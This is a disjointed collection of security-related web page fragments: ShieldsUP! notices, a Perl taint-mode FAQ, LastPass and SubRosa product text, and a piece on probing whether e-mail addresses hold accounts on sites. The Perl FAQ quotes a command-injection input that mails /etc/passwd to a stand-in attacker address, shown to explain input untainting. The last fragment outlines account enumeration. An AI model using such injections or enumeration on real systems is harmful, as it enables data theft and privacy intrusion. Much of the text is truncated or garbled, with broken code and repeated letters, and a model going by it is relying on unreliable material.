ShieldsUP! — Internet Vulnerability Profiling Your Internet connection's IP address is uniquely associated with the following "machine name": The string of text above is known as your Internet connection's "reverse DNS." The end of the string is probably a domain name related to your ISP. This will be common to all customers of this ISP. The concern is that any web site can easily retrieve this unique "machine name" (just as we have) whenever you visit. If the machine name shown above is only a version of the IP address, then there is less cause for concern because the name will change as, when, and if your Internet IP changes. There is no standard governing the format of these machine names, so this is not something we can automatically determine for you. Just something to keep in mind as you wander the Internet.
CGI/Perl Taint Mode FAQ For example, if $form_data{"email"} is "tainted", then the following would still be legal: print $form_data{"email"} . "\n"; because the print command is not an unsafe operation. But if you try to pass the same variable to an unsafe version of a system call system("mail " . Perl will complain and not allow this. "me@mydomain.com; mail hacker@hack.net < /etc/passwd" Clearly, there are security ramifications. Thus, if you want to do that type of command with a user supplied variable, you must always untaint it regardless of whether it contains harmless input or not. To untaint a variable, you use regular expressions. The only way to untaint a variable is to do a regular expression match using () groups inside the regular expression pattern match. Perl considers these new variables that arise from () groups to be untainted. The following will illustrate this: EMail addresses consist of word characters (a-zA-Z_0-9), dashes, periods and an @ sign. /\w{1}[\w-.] $email = $form_data{"email"}; OK. No.
EasyGPS - FREE GPS Software for your Garmin, Magellan, or Lowrance GPS Shields UP! -- Officially Unofficial ShieldsUP! FAQ _______________________________________________________________ ShieldsUp! Newsgroup Frequently Asked Questions Written and Compiled by Chris Baker Version 1.14 - 16 April 2000 Please note: If you wish to contact me with errors, omissions, or suggestions regarding this FAQ, feel free to e-mail me at faq-admin@home.com, and I will try to get back to you within 72 hours. However, if you have general questions or technical support issues regarding ShieldsUp!, or anything else for that matter, I regret that I have neither the time nor the resources to assist you directly. , or better yet, post your question in one of the ShieldsUp! Table of Contents Introduction This FAQ came into being on 29 February 2000, primarily because I got tired of answering the same few questions over and over again. Right now, it basically represents a compilation of what I know about internet security, with the excellent comments of several others thrown in. I also want to thank Dave Moose, a.k.a. Q. Q. Q. Q. Q.
Security Summit Network World - Can security be a competitive advantage? Are security and privacy at odds with speed and collaboration? How has Sarbanes-Oxley complicated the security challenge? And how do you balance risk and security? Those are just some of the pressing questions 23 prominent IT executives and academics addressed at a recent daylong executive roundtable at Dartmouth College in Hanover, N.H. The Thought Leadership Summit on Digital Strategies is an ongoing series of discussions for Fortune 500 CIOs and vice presidents focused on the business issues they face and the enabling role of IT. Participants represented some of the largest and most well-known companies in the U.S., including Fidelity, Staples, Citigroup, Owens-Corning, IBM, General Motors, Hasbro and Cisco . The executives shared with peers their security fears, goals, frustrations and challenges. There was widespread agreement on that point, but several participants noted that sometimes they can't avoid it. M.
Technology Your Security Is Our Priority Availability You need to always have access to your data, we've accomplished this in multiple ways, first we have 2 data-centers in production service, second we store your encrypted data on your local PC when you login, so that if LastPass.com can't be reached, you can still login to the add-on and get to your accounts. The website is usable without the add-on installed (the Encryption and Decryption happens in JavaScript which you can see happen on some forms), but we take advantage of faster encryption available in the add-ons if they're available. We also have a mobile site m.lastpass.com if you're on your phone. Security On Windows, LastPass helps find insecure passwords stored on your computer so you can store them securely in LastPass and remove the easy access by malicious software. Sharing Accounts With Friends Automated Testing Code Reviews Package Management
Macintosh Security Site -> SubRosa Utilities easy-to-use encryption and shredding software for Mac OS and X SubRosa Utilities (encryption/decryption file deletion) Information: SubRosa Vol 1-File Utilities is SubRosaSoft.com Ltd's first line of privacy products which help Macintosh users secure themselves and their personal data. The suite of software to protect your files consist of the following; file and folder encryption, multi-pass shredder, and free decryptor. SubRosa Encryptor The SubRosa Encryptor allows you to take files or folders and convert them into a encrypted archive that you can store safely using 128 bit key encryption. Your friend or family can easily decrypt the files by downloading the SubRosa decryptor for free from the FWB web page. A 'shred' feature is available within the decryptor which allows the user to securely delete the encrypted files once they have been decrypted. SubRosa Shredder SubRosa Shredder allows you to ensure that the files you want deleted from your computer stay deleted. The default overwrite policy is set at 3, which is considered most secure.
Reviews <div style='text-align:center'>JavaScript is required to use LastPass.<br />Our local encryption/decryption to keep your sensitive data out of our hands depends on it.<br />We do not recommend you attempt to login without Javascript enabled</div> Here is the cream of the crop, the 100 best of 2009...automatically fills in saved log-ins and forms with the click of a button. This handy Web freebie and browser plug-in also syncs your data to any computer that you use regularly. ...all you have to do is log into LastPass and click the website you wish to check out. ...I've completely switched my entire solution for managing passwords, after spending days researching it and testing it and playing with it, over to LastPass...And they really have nailed it. If you don't create strong passwords, you are a sitting duck....What I do honestly is use a password manager. Since LastPass is free and has the edge on browser and Mac compatibility, it should probably be your first pick.
How Private Are Sites' Membership Lists? Something like this is actually possible with quite a few well-known sites -- given a person's e-mail address, it is possible to find out if they have an account with Match.com, PayPal, Netflix, eBay, Amazon, and Google (and, by the way, Slashdot [CT: We'd fix it if I thought it mattered]). For some of those sites, it may even be possible to take a long list of e-mail addresses and use an automated process to find out which of those addresses have accounts with those sites (something I didn't want to risk trying myself, but as a general rule, if you can do it once, you can do it many times, at least if you do it slowly enough). It does not enable the attacker to extract addresses from a site's membership rolls, which is a much more serious type of breach -- in this case, the attacker would have to already know a list of e-mail addresses, and would only be able to find out which of those addresses have accounts with a given service. Try to create a new account with that e-mail address.